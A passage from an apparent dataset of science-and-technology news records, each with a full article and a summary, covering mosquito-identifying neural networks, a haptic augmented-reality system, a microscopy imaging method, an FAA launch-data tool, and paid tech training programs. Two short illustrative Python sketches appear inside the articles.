assistance to people with disabilities," Erickson said.
141
UOC Team Develops Neural Network to Identify Tiger Mosquitoes
A study by researchers in the Scene understanding and artificial intelligence (SUNAI) research group, of the Universitat Oberta de Catalunya's (UOC) Faculty of Computer Science, Multimedia and Telecommunications and of the eHealth Center, has developed a method that can learn to identify mosquitoes using a large number of images that volunteers took using mobile phones and uploaded to the Mosquito Alert platform. Citizen science to investigate and control disease-transmitting mosquitoes As well as being annoying because of their bites, mosquitoes can be the carriers of pathogens. Rising temperatures worldwide are facilitating their spread. This is the case with the tiger mosquito, Aedes albopictus, and other species in Spain and around the world. As these species spread, the science dedicated to combating the problems associated with them develops. This is how Mosquito Alert was set up, a citizen science project coordinated by the Centre for Research on Ecology and Forestry Applications, the Blanes Centre for Advanced Studies and the Universitat Pompeu Fabra, to which UOC researchers have contributed. This project brings together information collected by volunteer citizens, who use their mobile phones to capture images of mosquitoes as well as of their breeding sites in public spaces. Along with the photo, the location of the observation and other information needed to help identify the species are also collected. This data is then processed by entomologists and other experts to confirm the presence of a potentially disease-carrying species and alert the relevant authorities. In this way, with a simple photo and an app, citizens can help to generate a map of the mosquitoes' distribution all over the world and help to combat them. "Mosquito Alert is a platform set up in 2014 to monitor and control disease-carrying mosquitoes," says Gereziher Adhane, who worked on the study with Mohammad Mahdi Dehshibi and David Masip. "Identifying the mosquitoes is fundamental, as the diseases they transmit continue to be a major public health issue." "The greatest challenge we encountered in identifying the type of mosquito in this study was due to images taken in uncontrolled conditions by citizens," he comments. He explains that the images were often not shot in close-up and contained additional objects, which could reduce the performance of the proposed method. Even when the images were taken up close, they were not necessarily at an angle from which entomologists could quickly identify the species, or the body patterns were deformed because the mosquitoes had been killed before being photographed. "Entomologists and experts can identify mosquitoes in the laboratory by analysing the spectral wave forms of their wing beats, the DNA of larvae and morphological parts of the body," Adhane points out. "This type of analysis depends largely on human expertise and requires the collaboration of professionals, is typically time-consuming, and is not cost-effective because of the possible rapid propagation of invasive species. Moreover, this way of studying populations of mosquitoes is not easy to adapt to identify large groups with experiments carried out outside the laboratory or with images obtained in uncontrolled conditions," he adds. This is where neural networks can play a role as a practical solution for controlling the spread of mosquitoes. Deep neural networks, cutting-edge technology for identifying mosquitoes Neural networks consist of a complex combination of interconnected neurons. 
Information is entered at one end of the network and numerous operations are performed until a result is obtained. A feature of neural networks is that they can be trained in a supervised, semi-supervised, or unsupervised manner to process data and guide the network towards the type of result being sought. Another important characteristic is their ability to process large amounts of data, such as the images submitted by volunteers participating in the Mosquito Alert project. The neural network can be trained to analyse images, among other data types, and detect small variations that could be difficult for experts to easily perceive. "Manual inspection to identify the disease-carrying mosquitoes is costly, requires a lot of time and is difficult in settings outside the laboratory. Automated systems to identify mosquitoes could help entomologists to monitor the spread of disease vectors with ease," the UOC researcher emphasizes. Conventional machine learning algorithms are not efficient enough for big data analysis like the data available on the Mosquito Alert platform, because the images contain many details and there is a high degree of similarity between the morphological structures of different mosquito species. However, in the study, the UOC researchers showed that deep neural networks can be used to distinguish between the morphological similarities of different species of mosquito, using the photographs uploaded to the platform. "The neural network we have developed can perform as well or nearly as well as a human expert and the algorithm is sufficiently powerful to process massive amounts of images," says Adhane. How does a deep neural network work? "When a deep neural network receives input data, information patterns are learned through convolution, pooling, and activation layers which ultimately arrive at the output units to perform the classification task," the researcher tells us, describing the complex process hidden behind this model. "For a neural network to learn there has to be some kind of feedback, to reduce the difference between real values and those predicted by the computing operation. The network is trained until the designers determine that its performance is satisfactory. The model we have developed could be used in practical applications with small modifications to work with mobile apps," he explains. Although there is still much development work to do, the researcher concludes that "using this trained network it is possible to make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." This UOC research project supports sustainable development goal (SDG) 3: Ensure health and well-being for all, at every stage of life. Mosquito Alert is a project coordinated by the CREAF (Centre de Recerca Ecològica i Aplicacions Forestals), UPF (Universitat Pompeu Fabra), ICREA (Institución Catalana de Investigación y Estudios Avanzados) and CEAB-CSIC (Centro de Estudios Avanzados de Blanes). Reference article: Adhane, Gereziher, Mohammad Mahdi Dehshibi, and David Masip. 2021. "A Deep Convolutional Neural Network for Classification of Aedes Albopictus Mosquitoes." IEEE Access 9: 72681-90. https://doi.org/10.1109/ACCESS.2021.3079700. UOC R&I The UOC's research and innovation (R&I) is helping overcome pressing challenges faced by global societies in the 21st century, by studying interactions between technology and human & social sciences with a specific focus on the network society, e-learning and e-health. 
This UOC research project supports sustainable development goal (SDG) 3: Ensure health and well-being for all, at every stage of life. Mosquito Alert is a project coordinated by CREAF (Centre de Recerca Ecològica i Aplicacions Forestals), UPF (Universitat Pompeu Fabra), ICREA (Institución Catalana de Investigación y Estudios Avanzados) and CEAB-CSIC (Centro de Estudios Avanzados de Blanes). Reference article: Adhane, Gereziher, Mohammad Mahdi Dehshibi, and David Masip. 2021. "A Deep Convolutional Neural Network for Classification of Aedes Albopictus Mosquitoes." IEEE Access 9: 72681-90. https://doi.org/10.1109/ACCESS.2021.3079700. UOC R&I The UOC's research and innovation (R&I) is helping overcome pressing challenges faced by global societies in the 21st century, by studying interactions between technology and human & social sciences with a specific focus on the network society, e-learning and e-health. Over 500 researchers and 51 research groups work among the University's seven faculties and two research centres: the Internet Interdisciplinary Institute (IN3) and the eHealth Center (eHC). The United Nations' 2030 Agenda for Sustainable Development and open knowledge serve as strategic pillars for the UOC's teaching, research and innovation. More information: research.uoc.edu. #UOC25years
A new technique can learn to identify tiger mosquitoes using a large set of images captured on mobile phones and uploaded to the Mosquito Alert platform by volunteers. Scientists at Spain's Universitat Oberta de Catalunya (UOC) engineered a deep neural network to differentiate between the morphological similarities of diverse mosquito species, and UOC's Gereziher Adhane said the network performs as well or nearly as well as human experts, and can process vast volumes of images. Adhane also said the algorithm, with modest tweaking, could work with mobile applications. Adhane said the neural network can "make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project."
[]
[]
[]
scitechnews
None
None
None
None
A new technique can learn to identify tiger mosquitoes using a large set of images captured on mobile phones and uploaded to the Mosquito Alert platform by volunteers. Scientists at Spain's Universitat Oberta de Catalunya (UOC) engineered a deep neural network to differentiate between the morphological similarities of diverse mosquito species, and UOC's Gereziher Adhane said the network performs as well or nearly as well as human experts, and can process vast volumes of images. Adhane also said the algorithm, with modest tweaking, could work with mobile applications. Adhane said the neural network can "make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." A study by researchers in the Scene understanding and artificial intelligence ( SUNAI ) research group, of the Universitat Oberta de Catalunya's (UOC) Faculty of Computer Science, Multimedia and Telecommunications and of the eHealth Center , has developed a method that can learn to identify mosquitoes using a large number of images that volunteers took using mobile phones and uploaded to Mosquito Alert platform. Citizen science to investigate and control disease-transmitting mosquitoes As well as being annoying because of their bites, mosquitoes can be the carriers of pathogens. Rising temperatures worldwide are facilitating their spread. This is the case with the tiger mosquito, Aedes albopictus , and other species in Spain and around the world. As these species spread, the science dedicated to combating the problems associated with them develops. This is how Mosquito Alert was set up, a citizen science project coordinated by the Centre for Research on Ecology and Forestry Applications, the Blanes Centre for Advanced Studies and the Universitat Pompeu Fabra to which UOC researchers have contributed. This project brings together information collected by volunteer citizens, who use their mobile phones to capture mosquito images as well as that of their breeding sites in public spaces. Along with the photo the location of the observation and other necessary information to help in the identification of the species are also collected. This data is then processed by entomologists and other experts to confirm the presence of a potentially disease-carrying species and alert the relevant authorities. In this way, with a simple photo and an app, citizens can help to generate a map of the mosquitoes' distribution all over the world and help to combat them. "Mosquito Alert is a platform set up in 2014 to monitor and control disease-carrying mosquitoes," says Gereziher Adhane, who worked on the study with Mohammad Mahdi Dehshibi and David Masip . "Identifying the mosquitoes is fundamental, as the diseases they transmit continue to be a major public health issue. "The greatest challenge we encountered in identifying the type of mosquito in this study was due to images taken in uncontrolled conditions by citizens ," he comments. He explains, the image was not shot in close-up, and it contains additional objects, which could reduce the performance of the proposed method. Even if the images were taken up close, they were not necessarily at an angle that entomologists could quickly identify, or because the images were taken of killed mosquitos, the mosquito body patterns were deformed. 
"Entomologists and experts can identify mosquitoes in the laboratory by analysing the spectral wave forms of their wing beats, the DNA of larvae and morphological parts of the body," Adhane points out. "This type of analysis depends largely on human expertise and requires the collaboration of professionals, is typically time-consuming, and is not cost-effective because of the possible rapid propagation of invasive species . Moreover, this way of studying populations of mosquitoes is not easy to adapt to identify large groups with experiments carried out outside the laboratory or with images obtained in uncontrolled conditions," he adds. This is where neural networks can play a role as a practical solution for controlling the spread of mosquitoes. Deep neural networks, cutting-edge technology for identifying mosquitoes Neural networks consist of a complex combination of interconnected neurons . Information is entered at one end of the network and numerous operations are performed until a result is obtained. A feature of neural networks is that they can be trained t hrough supervised, semi-supervised, or unsupervised manner to process data and guide the network about the type of result being sought. Another important characteristic is their ability to process large amounts of data , such as those submitted by volunteers participated in Mosquito Alert project. The neural network can be trained to analyse images, among other data types, and detect small variations that could be difficult for experts to easily perceive. "Manual inspection to identify the disease-carrying mosquitoes is costly, requires a lot of time and is difficult in settings outside the laboratory. Automated systems to identify mosquitoes could help entomologists to monitor the spread of disease vectors with ease," the UOC researcher emphasizes. Conventional machine learning algorithms are not efficient enough for big data analysis like the data available in Mosquito Alert platform, because it contains many details and there is a high degree of similarity between the morphological structures of different mosquito species. However, in the study, the UOC researchers showed that deep neural networks can be used to distinguish between the morphological similarities of different species of mosquito, using the photographs uploaded to the platform. "The neural network we have developed can perform as well or nearly as well as a human expert and the algorithm is sufficiently powerful to process massive amounts of images," says Adhane. How does a deep neural network work? "When a deep neural network receives input data, information patterns are learned through convolution, pooling, and activation layers which ultimately arrive at the output units to perform the classification task," the researcher tells us, describing the complex process hidden behind this model. "For a neural network to learn there has to be some kind of feedback, to reduce the difference between real values and those predicted by the computing operation. The network is trained until the designers determine that its performance is satisfactory . The model we have developed could be used in practical applications with small modifications to work with mobile apps," he explains. Although there is still much development work to do the researcher concludes that "using this trained network it is possible to make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." 
This UOC research project supports sustainable development goal (SDG) 3: Ensure health and well-being for all, at every stage of life Mosquito Alert is a project coordinated by the CREAF (Centre de Recerca Ecològica i Aplicacions Forestals), UPF (Universitat Pompeu Fabra) ICREA (Institución Catalana de Investigación y Estudios Avanzados) and CEAB-CSIC (Centro de Estudios Avanzados de Blanes). Reference article Adhane, Gereziher, Mohammad Mahdi Dehshibi, and David Masip. 2021. "A Deep Convolutional Neural Network for Classification of Aedes Albopictus Mosquitoes." IEEE Access 9: 72681-90. https://doi.org/10.1109/ACCESS.2021.3079700. UOC R&I The UOC's research and innovation (R&I) is helping overcome pressing challenges faced by global societies in the 21st century, by studying interactions between technology and human & social sciences with a specific focus on the network society , e-learning and e-health . Over 500 researchers and 51 research groups work among the University's seven faculties and two research centres: the Internet Interdisciplinary Institute ( IN3 ) and the eHealth Center ( eHC ). The United Nations' 2030 Agenda for Sustainable Development and open knowledge serve as strategic pillars for the UOC's teaching, research and innovation. More information: research.uoc.edu . #UOC25years
142
AR System Alters Sight, Sound, Touch
There's the typical pitter-patter sound that comes from a person drumming their fingers along a tabletop. But what if this normal pitter-patter sound was perceived as a series of hollow echoes? Or rolling thunder? A new augmented reality system called Tactile Echoes provides users with experiences like this, and could be used for a wide range of gaming, entertainment and research purposes. Notably, the system does not require any equipment between the user's fingertips and the contact surface, meaning users can enjoy the real sensation of their environment along with the visual, haptic and auditory augmented enhancements. "Tactile Echoes is possibly the first programmable system for haptic augmented reality that allows its users to freely touch physical objects or surfaces augmented with multimodal digital feedback using their hands," says Anzu Kawazoe, a PhD candidate at the University of California, Santa Barbara, who co-designed Tactile Echoes. It accomplishes this using a sensor placed on top of the user's fingernail, which detects the vibrations that are naturally produced within the finger as it touches a surface. The vibrational signals are processed and translated into programmed sounds. Different tactile feedback and sounds can be played with each interaction, because the vibrational patterns in our fingers change depending on what surface we touch, or the intensity of pressure applied. For example, Tactile Echoes may play a light, fun echo when you tap an object lightly, or play a sudden thud if you jab the object with force. "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptics and effects that playfully respond to how or where we touch," explains Kawazoe. Her team took the system one step further by integrating the wearable device with virtual environments created by a smart projector or a VR or AR headset. In this way, users can "touch" virtual objects in their real environment, and experience enhanced graphic, sound and haptic feedback. The researchers tested Tactile Echoes through a number of user experiments, described in a study published May 26 in IEEE Transactions on Haptics. First, study participants were asked to describe different sounds, and what perceptions and associations each one evoked. In a second experiment, participants used Tactile Echoes to complete an interactive, augmented reality video game that was projected onto an ordinary desktop surface. Users reported that the Tactile Echoes feedback greatly enhanced the game's responsiveness, as well as their level of engagement and agency while playing it. While Tactile Echoes is still a prototype, Kawazoe says her team is interested in collaborating with companies to commercialize this tech. "Some of the most promising applications we can envisage include augmented reality games that can be played on any table top, musical devices whose interface can be projected wherever needed, and educational systems for enlivening learning by K-12 students," she says. She also notes that her team's research so far with Tactile Echoes has revealed some interesting perceptual phenomena that occur when haptic feedback is delayed through the system. In particular, they believe that perceptual masking is happening, whereby the perception of one stimulus affects the perceived intensity of a second stimulus. "We are thinking that this tactile masking effect is working on the Tactile Echoes system.
Specifically, time-delayed tactile feedback is perceived as stronger," explains Kawazoe. "We are preparing new experiments to investigate these effects, and plan to use the results to further improve the Tactile Echoes system."
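For readers who want a feel for the processing chain described above, the small Python sketch below estimates the intensity of a simulated fingertip vibration and maps it to a programmed response, adding delayed, attenuated copies of the signal as a crude "echo." The sample rate, thresholds and echo parameters are invented for the example; this illustrates the general idea only and is not the actual Tactile Echoes signal processing.

# Hypothetical illustration of mapping a sensed fingertip vibration to a
# programmed response; not the actual Tactile Echoes processing chain.
import numpy as np

SAMPLE_RATE = 4000  # Hz, assumed sensor rate

def synth_tap(amplitude, duration=0.05):
    """Crude stand-in for a vibration burst picked up by the fingernail sensor."""
    t = np.linspace(0, duration, int(SAMPLE_RATE * duration), endpoint=False)
    return amplitude * np.exp(-40 * t) * np.sin(2 * np.pi * 200 * t)

def respond(vibration, echo_delay=0.03, echo_gain=0.5, hard_threshold=0.2):
    """Estimate tap intensity and return a label plus a signal with added echoes."""
    intensity = float(np.sqrt(np.mean(vibration ** 2)))  # RMS energy of the tap
    label = "hard jab -> thud" if intensity > hard_threshold else "light tap -> airy echo"
    out = np.copy(vibration)
    delay = int(echo_delay * SAMPLE_RATE)
    # Add delayed, attenuated copies of the input as a simple echo effect.
    for k in (1, 2):
        n = len(out) - k * delay
        if n <= 0:
            break
        out[k * delay:] += (echo_gain ** k) * vibration[:n]
    return label, out

for amp in (0.2, 1.0):
    label, signal = respond(synth_tap(amp))
    print(amp, label, round(float(np.max(np.abs(signal))), 3))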
Researchers at the University of California, Santa Barbara have developed an augmented reality (AR) system that can translate the vibrations produced by fingers touching a surface into programmed sounds. The system, Tactile Echoes, could be used for gaming, entertainment, and research purposes. A sensor placed on a user's fingernail can detect the vibrations produced within the finger as it touches a surface, creating different sounds depending on the surface touched or the pressure applied. Researcher Anzu Kawazoe said, "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptics and effects that playfully respond to how or where we touch." The device can be integrated with smart projectors or virtual reality or AR headsets to allow users to touch virtual objects in their real environment and receive graphic, sound, and haptic feedback.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the University of California, Santa Barbara have developed an augmented reality (AR) system that can translate the vibrations produced by fingers touching a surface into programmed sounds. The system, Tactile Echoes, could be used for gaming, entertainment, and research purposes. A sensor placed on a user's fingernail can detect the vibrations produced within the finger as it touches a surface, creating different sounds depending on the surface touched or the pressure applied. Researcher Anzu Kawazoe said, "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptics and effects that playfully respond to how or where we touch." The device can be integrated with smart projectors or virtual reality or AR headsets to allow users to touch virtual objects in their real environment and receive graphic, sound, and haptic feedback. There's the typical pitter-patter sound that comes from a person drumming their fingers along a tabletop. But what if this normal pitter-patter sound was perceived as a series of hollow echoes? Or rolling thunder? A new augmented reality system called Tactile Echoes provides users with experiences like this, and could be used for a wide range of gaming, entertainment and research purposes. Notably, the system does not require any equipment between the user's fingertips and the contact surface, meaning users can enjoy the real sensation of their environment along with the visual, haptic and auditory augmented enhancements. "Tactile Echoes is possibly the first programmable system for haptic augmented reality that allows its users to freely touch physical objects or surfaces augmented with multimodal digital feedback using their hands," says Anzu Kawazoe , a PhD candidate at the University of California, Santa Barbara who co-designed Tactile Echoes. It accomplishes this using a sensor that is placed on the top of the user's fingernail, which detects the vibrations that are naturally produced within the finger as it touches a surface. The vibrational signals are processed and translated into programmed sounds. Different tactile feedback and sounds can be played with each interaction, because the vibrational patterns in our fingers change depending on what surface we touch, or the intensity of pressure applied. For example, Tactile Echoes may play a light, fun echo when you tap an object lightly, or play a sudden thud if you jab the object with force. "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptic and effects that playfully respond to how or where we touch," explains Kawazoe. Her team took the system one step further by integrating the wearable device with virtual environments created by a smart projector or a VR or AR headset. In this way, users can "touch" virtual objects in their real environment, and experience enhanced graphic, sound and haptic feedback. The researchers tested Tactile Echoes through a number of user experiments, described in study published May 26 in IEEE Transactions on Haptics . First, study participants were asked to describe different sounds, and what perceptions and associations are evoked with each one. In a second experiment, participants used Tactile Echoes to complete an interactive, augmented reality video game that was projected onto an ordinary desktop surface. 
Users reported that the Tactile Echoes feedback greatly enhanced the responsiveness, and their level of engagement and agency in playing the game. While Tactile Echoes is still a prototype, Kawazoe says her team is interested in collaborating with companies to commercialize this tech. "Some of the most promising applications we can envisage include augmented reality games that can be played on any table top, musical devices whose interface can be projected wherever needed, and educational systems for enlivening learning by K-12 students," she says. She also notes that her team's research so far with Tactile Echoes has revealed some interesting perceptual phenomena that occur when haptic feedback is delayed through the system. In particular, they believe that perceptual masking is happening, whereby the perception of one stimulus affects the perceived intensity of a second stimulus. "We are thinking that this tactile masking effect is working on the Tactile Echoes system. Specifically, time-delayed tactile feedback is as perceived stronger," explains Kawazoe. "We are preparing new experiments to investigate these effects, and plan to use the results to further improve the Tactile Echoes system."
143
Imaging Technique May Boost Biology, Neuroscience Research
Researchers at Harvard University and the Massachusetts Institute of Technology have developed a computational imaging process that could improve biology and neuroscience research. The new system, De-scattering with Excitation Patterning (DEEP), uses computational imaging to generate high-resolution images 100 to 1,000 times faster than point-scanning multiphoton microscopy or temporal focusing microscopy. DEEP uses near-infrared laser light to penetrate deep into biological tissue, which scatters the light and excites the fluorescent molecules to be imaged, which emit signals to be captured by the microscope. Harvard's Dushan N. Wadduwage said, "This is very important for neuroscientists and other biologists to actually get better statistics, as well as to see what's happening around the area being imaged."
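The researchers' paper describes the actual DEEP reconstruction; purely to illustrate what computational imaging from patterned excitation means in general, the toy Python example below recovers a small image from a set of patterned measurements by solving a linear system. The pattern model, dimensions and noise level are invented for the example and do not reflect DEEP's algorithm.

# Toy illustration of computational image recovery from patterned measurements.
# Generic demonstration only; this is not the DEEP reconstruction algorithm.
import numpy as np

rng = np.random.default_rng(0)
n = 16 * 16                      # unknown image, flattened (16x16 pixels, assumed)
truth = np.zeros(n)
truth[40:60] = 1.0               # a simple bright structure to recover

num_patterns = 400               # number of excitation patterns (assumed)
patterns = rng.integers(0, 2, size=(num_patterns, n)).astype(float)  # on/off patterns

# Each measurement is the total signal collected under one pattern, plus noise.
measurements = patterns @ truth + 0.01 * rng.standard_normal(num_patterns)

# Recover the image computationally by solving the linear system in a
# least-squares sense.
estimate, *_ = np.linalg.lstsq(patterns, measurements, rcond=None)
print("reconstruction error:", round(float(np.linalg.norm(estimate - truth)), 3))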
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Harvard University and the Massachusetts Institute of Technology have developed a computational imaging process that could improve biology and neuroscience research. The new system, De-scattering with Excitation Patterning (DEEP), uses computational imaging to generate high-resolution images 100 to 1,000 times faster than point-scanning multiphoton microscopy or temporal focusing microscopy. DEEP uses near-infrared laser light to penetrate deep into biological tissue, which scatters the light and excites the fluorescent molecules to be imaged, which emit signals to be captured by the microscope. Harvard's Dushan N. Wadduwage said, "This is very important for neuroscientists and other biologists to actually get better statistics, as well as to see what's happening around the area being imaged."
144
FAA: Tool Limits Disruptions Caused by Space Operations
The U.S. Federal Aviation Administration (FAA) last week announced it was using new technology that can automatically deliver data about a space vehicle's trajectory to the U.S. air traffic control system almost instantly. The Space Data Integrator tool will largely replace the manual task of sending such information, which could shorten the amount of time required to route airplanes around space operations. The regulator said the technology was first used for last month's launch of SpaceX's Transporter 2 satellite deployment vehicle; it also will be employed for the return of a SpaceX cargo ship from the International Space Station. The FAA's Stephen Dickson said, "With this capability, we will be able to safely reopen the airspace more quickly and reduce the number of aircraft and other airspace users affected by a launch or reentry."
[]
[]
[]
scitechnews
None
None
None
None
The U.S. Federal Aviation Administration (FAA) last week announced it was using new technology that can automatically deliver data about a space vehicle's trajectory to the U.S. air traffic control system almost instantly. The Space Data Integrator tool will largely replace the manual task of sending such information, which could shorten the amount of time required to route airplanes around space operations. The regulator said the technology was first used for last month's launch of SpaceX's Transporter 2 satellite deployment vehicle; it also will be employed for the return of a SpaceX cargo ship from the International Space Station. The FAA's Stephen Dickson said, "With this capability, we will be able to safely reopen the airspace more quickly and reduce the number of aircraft and other airspace users affected by a launch or reentry."
145
Facing Skilled Worker Shortage, U.S. Technology Companies Try to Train Their Own Labor Pools
Arriving in Columbia, Missouri, at 18, Mateusz Haruza saw the University of Missouri as a stepping stone to a career in tech. When the dean's list student came out to his parents, they withdrew their financial support, and Haruza began struggling academically. He dropped out of college and started working at a UPS Store while running up credit card debt and stringing out his college loans. He'd hit "absolute rock bottom." Last year, friends guided Haruza to a fledgling IBM program that pays new workers as they receive classroom instruction and on-the-job training - no college degree needed. That kind of recruiting was a relatively new solution for IBM and other companies that generally require bachelor's degrees for entry-level white-collar workers. Now, strapped for talent, an increasing number of employers are reconsidering degree requirements and adopting training systems more common in blue-collar trades. Haruza, now 27, is six months into IBM's two-year program, and said it's a supportive environment that feels like family. That's a feeling IBM is trying to grow. While claims of low-wage worker shortages have received considerable pushback , there's broad consensus that some sectors of the economy - technology , health care and tech-adjacent businesses such as insurance - face a genuine dearth of qualified talent . Programs like IBM's have been promoted as having so much potential to address this issue that Congress's research arm recommended requiring employers to offer them, or to be taxed to pay for them. While being paid to train is hardly a new idea, it can be effective on multiple levels. Workers find more rewarding careers while employers enjoy a deeper talent pool, said Amy Kardel of CompTIA, an information technology trade association. People hired through the programs also tend to stay on the job longer; such programs can also broaden a company's culture by attracting employees, including workers of color, whose life experiences are outside the high school-to-college career arc common in white-collar workplaces. "Earn-and-learn strategies can open a door for someone into a career quickly," said Kardel, CompTIA's vice president for strategic workforce relationships. Just one in 300 American workers have participated in a formalized on-the-job training program, a rate less than one-tenth of that in much of western Europe . This despite increased attention here to the white-collar version of the kind of apprenticeship models that remain a staple of the unionized building trades. Still, being paid to train is becoming more common in the United States. The U.S. Department of Labor statistics shows a 70 percent increase in paid apprenticeships during the past decade . Aon, a London-based insurance giant, opened its U.S. earn-and-learn program in 2017, launching a 26-student class to its North American headquarters in Chicago. It has since joined with other Chicago businesses and community colleges to bring on more than 1,000 employee trainees around the city, and expanded its program to Aon offices around the country. Aon trainees join a career track - technology or finance, generally - while working with mentors on the job and taking community college classes. They're paid a full-time wage, taking on tasks previously done by recent university or college graduates. This shift to structured training also enables Aon to inject new diversity - in race, in gender and in life experience - into its business. 
Bridget Gainer, Aon's chief commercial officer, said the company is stronger for it. "Look, we're in the risk business," Gainer said. "Being able to determine risk takes all types of thought." When looking for talent, Aon recruiters had been turning to the Big Ten universities, Gainer said. Overlooked were institutions like the one Gainer sees from her office window: Harold Washington College, one of the City Colleges of Chicago. That's where Juawana Allen found Aon, by way of a flyer in the library advertising the Aon program. Allen had been working as a nanny and in retail while going to school full time. Her aim then was a law degree. A meeting with an Aon recruiter changed her course. "They were looking for people who were eager to learn and hungry for opportunity," said Allen, 23. "I'm extremely ambitious, and this lined up exactly with what I wanted to do." Joining the company's third trainee class, Allen was paid to split her hours between on-the-job training and classroom instruction provided at Harold Washington. The days were long - Allen and others regularly started work at 9 a.m. before heading to classes that wrapped up around 9 p.m. - but Allen made it through, graduating in December 2020. She now works in reinsurance in the company's Dallas office. Allen aspires to be one of the first women of color in a leadership role at Aon. If she succeeds, she will deliver on one of Gainer's hopes: to improve diversity in senior positions. The insurance industry, like most industries , is disproportionately white and male at the management level. "As a business community, we need to do a better job of diversifying our workforce, full stop," Gainer said. "If you don't address it at the entry level, you're abdicating your responsibility to actually make a change." Another set of employers - America's hospitals and clinics - have long relied on women and people of color to fill their ranks. They are chronically short on staff nonetheless. To address that shortfall in Washington, a training organization run by the state's largest hospitals and their biggest labor union provides a tuition assistance program that will pay the way for hospital employees to advance their educations in health-related fields. "We'll pay for their AA, their BA, their MBA, their PhD, the whole nine yards," said Laura Hopkins, executive director at SEIU Healthcare 1199NW Multi-Employer Training and Education Fund. "You don't have to have a dime in your pocket and you can get your education." Seven years ago, Eva Zhang was a waitress at a suburban Seattle sushi restaurant. Today, thanks to the training fund, she's being paid to become a nurse. Raised in Hubei, China, Zhang moved to the United States with her eldest son and then-husband when she was 24. She spent her first decade working in restaurants before deciding she wanted more growth and better benefits, especially for retirement. She enrolled at a small technical school just outside Seattle to become a medical assistant. The program was overwhelming - she was working full time and raising a family - but she graduated in 2015, at a cost of $10,000. Her starting wage - $16 an hour - hardly justified that investment. She was making less than she had at the sushi restaurant, where she continued to work on weekends. But the job qualified her for a no-cost education program run jointly by her employer and her union. 
Modeled on programs in New York State and elsewhere, the Washington initiative guides workers to courses of study at the University of Washington and other area institutions that suit their needs. Zhang, who reenrolled in college in the fall of 2019, plans to become a certified nursing assistant or licensed practical nurse, in-demand occupations that would increase her earnings and enable her to take on more complex, interesting work. "The more I know, the more I can contribute to the patients and coworkers at my job," Zhang said. "It's really a lot for people who have a family and have work to go back to school. It's not easy, but for me, I'm really grateful." Worker shortages are particularly acute in tech, where companies compete for workers who can take their skills anywhere. But technological proficiency isn't a priority only in Silicon Valley, said CompTIA's Kardel, whose employer is working with the U.S. Department of Labor to promote on-the-job learning. Employers who rely on technology - a group that includes most manufacturers, many retailers and the government - are chasing the same workers. "Tech is not only a vertical, it's horizontal," Kardel said. "These jobs are part of companies we all rely on every day." Ticking through the positions IBM looks to fill with trainees, Kelli Jordan, IBM's director of career and skills, borrowed a phrase coined five years ago by a former IBM CEO: " new-collar jobs ." The company is looking for employees who can take on white-collar work that doesn't, or shouldn't, require a four-year degree. The necessary learning happens on the job. IBM aims to hire more than 400 trainees each year, putting them on 25 different training tracks, from software development to data science to human resources, Jordan said. IBM retains about 90 percent of participants in the program, which has cost the company $65 million since 2018. Like many in its industry, IBM is advocating for the National Apprenticeship Act , which would inject $3.5 billion in federal support for Department of Labor-registered programs like these. The legislation passed the House of Representatives with broad support but has not come up for a vote in the Senate. As IBM measures it , the federal government puts forward $130 billion annually in grants, loans, and other benefits to undergraduate students pursuing bachelor's and other higher education degrees - spending that, in the company's view, no longer meets the needs of the digital economy. Programs that pay trainees to learn "are so critically important when we think about making good, well-paying jobs accessible to everybody," Jordan said. "And for companies, it's not something that is insurmountable." Haruza, the IBM trainee, is learning database management during the days. He's still chipping away at his bachelor's degree in the evenings - mostly to put off having to pay back his student loans. Haruza doesn't think the college degree will be particularly useful, and doesn't see why anyone would need one in a field that requires regular retraining anyway. "I hope education changes to something that's actually beneficial to people," Haruza said, "and can actually get them jobs." This story about paid training programs was produced by The Hechinger Report , a nonprofit, independent news organization focused on inequality and innovation in education. Sign up for the Hechinger newsletter .
Technology companies are working to address a shortage of qualified talent. IBM, for instance, is offering a two-year program for entry-level workers without college degrees, providing classroom instruction and on-the-job training for in-demand positions it has difficulty filling. CompTIA's Amy Kardel said, "Earn-and-learn strategies can open a door for someone into a career quickly." The IT trade association is working to promote on-the-job learning with the U.S. Department of Labor. Kardel said employers who depend on technology, including manufacturers, retailers, and the government, are competing with Silicon Valley for the same workers. IBM, which is looking to hire over 400 trainees annually, offers 25 different training tracks, including software development, data science, and human resources. The company retains about 90% of participants. IBM's Kelli Jordan said the company is offering "new-collar jobs," white-collar work that does not require a four-year degree but offers necessary learning on the job.
[]
[]
[]
scitechnews
None
None
None
None
Technology companies are working to address a shortage of qualified talent. IBM, for instance, is offering a two-year program for entry-level workers without college degrees, providing classroom instruction and on-the-job training for in-demand positions it has difficulty filling. CompTIA's Amy Kardel said, "Earn-and-learn strategies can open a door for someone into a career quickly." The IT trade association is working to promote on-the-job learning with the U.S. Department of Labor. Kardel said employers who depend on technology, including manufacturers, retailers, and the government, are competing with Silicon Valley for the same workers. IBM, which is looking to hire over 400 trainees annually, offers 25 different training tracks, including software development, data science, and human resources. The company retains about 90% of participants. IBM's Kelli Jordan said the company is offering "new-collar jobs," white-collar work that does not require a four-year degree but offers necessary learning on the job. Arriving in Columbia, Missouri, at 18, Mateusz Haruza saw the University of Missouri as a stepping stone to a career in tech. When the dean's list student came out to his parents, they withdrew their financial support, and Haruza began struggling academically. He dropped out of college and started working at a UPS Store while running up credit card debt and stringing out his college loans. He'd hit "absolute rock bottom." Last year, friends guided Haruza to a fledgling IBM program that pays new workers as they receive classroom instruction and on-the-job training - no college degree needed. That kind of recruiting was a relatively new solution for IBM and other companies that generally require bachelor's degrees for entry-level white-collar workers. Now, strapped for talent, an increasing number of employers are reconsidering degree requirements and adopting training systems more common in blue-collar trades. Haruza, now 27, is six months into IBM's two-year program, and said it's a supportive environment that feels like family. That's a feeling IBM is trying to grow. While claims of low-wage worker shortages have received considerable pushback , there's broad consensus that some sectors of the economy - technology , health care and tech-adjacent businesses such as insurance - face a genuine dearth of qualified talent . Programs like 